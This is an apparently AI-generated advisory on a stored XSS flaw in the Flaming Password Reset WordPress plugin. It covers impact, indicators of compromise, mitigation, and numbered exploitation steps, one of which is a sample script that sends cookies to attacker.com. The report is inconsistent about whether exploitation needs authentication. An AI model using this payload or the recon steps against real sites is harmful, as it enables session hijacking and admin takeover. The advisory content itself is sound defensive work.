CVE-2025-68875
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-68875 is a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin Flaming Password Reset (plugin slug: flaming-password-reset) developed by jcaruso001. It affects all versions up to and including 1.0.3, with no official patch available as of the time of disclosure. The vulnerability was reported by researcher Nguyen Xuan Chien on September 25, 2025, and published by Patchstack on December 29, 2025, with NVD publication on January 8, 2026. The CVSS v3.1 base score is 6.5 (Medium) as assessed by Patchstack (Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant, meaning malicious script payloads are persisted server-side and later rendered in victims' browsers (Patchstack). The plugin fails to properly sanitize or escape user-supplied input before storing and rendering it in web pages, allowing an attacker to inject arbitrary HTML/JavaScript. Exploitation requires low privileges (the attacker must be able to submit input to the plugin's password reset functionality) and user interaction from a privileged user to trigger the stored payload. No public proof-of-concept code has been identified at this time.

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript within the WordPress site, which executes in the browsers of any user — including administrators — who views the affected page. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of site visitors to malicious content. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the vulnerable component itself, potentially affecting the broader WordPress environment and its users (Patchstack).

Exploitability

No public exploit code or active in-the-wild exploitation has been confirmed for CVE-2025-68875. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term (Feedly). Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns targeting WordPress plugins at scale, regardless of site popularity. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack has issued a virtual patching/mitigation rule for subscribers while no official plugin patch exists.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Flaming Password Reset plugin (version ≤ 1.0.3) using tools like WPScan, Shodan, or by checking the plugin's presence via /wp-content/plugins/flaming-password-reset/.
  2. Craft malicious payload: Prepare a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) to be injected into a user-controlled input field processed by the plugin.
  3. Submit payload: Using a low-privileged account (or potentially unauthenticated, per Patchstack's "Unauthenticated" required privilege note), submit the crafted payload through the plugin's password reset form or related input field that is stored without proper sanitization.
  4. Wait for victim interaction: The payload is stored in the WordPress database and rendered when a privileged user (e.g., administrator) views the affected page or processes the password reset request.
  5. Achieve objective: The victim's browser executes the injected script, enabling session cookie theft, account takeover, or further malicious actions within the WordPress admin context (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unusual POST requests to password reset endpoints with abnormally long or script-containing parameter values; PHP error logs referencing the flaming-password-reset plugin.
  • Database: WordPress database entries in wp_options, wp_usermeta, or plugin-specific tables containing <script>, javascript:, onerror=, or similar XSS patterns in fields associated with the Flaming Password Reset plugin.
  • Network: Outbound HTTP requests from victim browsers to unknown external domains shortly after administrator page loads, potentially carrying cookie or session data in query parameters.
  • File System: Presence of the plugin directory /wp-content/plugins/flaming-password-reset/ with version ≤ 1.0.3 confirmed via readme.txt or plugin header.

Mitigation and workarounds

No official patch from the plugin developer (jcaruso001) is available for versions ≤ 1.0.3 as of the disclosure date (Patchstack). The recommended immediate action is to deactivate and remove the Flaming Password Reset plugin until a patched version is released. Patchstack subscribers benefit from a virtual patching rule that blocks exploitation attempts without requiring a code-level fix. Site owners should also implement a Web Application Firewall (WAF) with XSS filtering rules as an additional layer of defense.

Community reactions

Wordfence included CVE-2025-68875 in its weekly WordPress vulnerability report covering December 15, 2025 to January 4, 2026 (Wordfence). Patchstack, the assigning CNA, characterized the vulnerability class as commonly leveraged in mass-exploit campaigns against WordPress plugins. No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability database aggregation.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19089NONEN/A
  • product-input-fields-for-woocommerce
NoYesAug 10, 2026
CVE-2026-19077NONEN/A
  • copy-delete-posts
NoYesAug 10, 2026
CVE-2026-19075NONEN/A
  • all-in-one-video-gallery
NoYesAug 10, 2026
CVE-2026-19074NONEN/A
  • advanced-classifieds-and-directory-pro
NoYesAug 10, 2026
CVE-2026-19053NONEN/A
  • prosolution-wp-client
NoYesAug 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management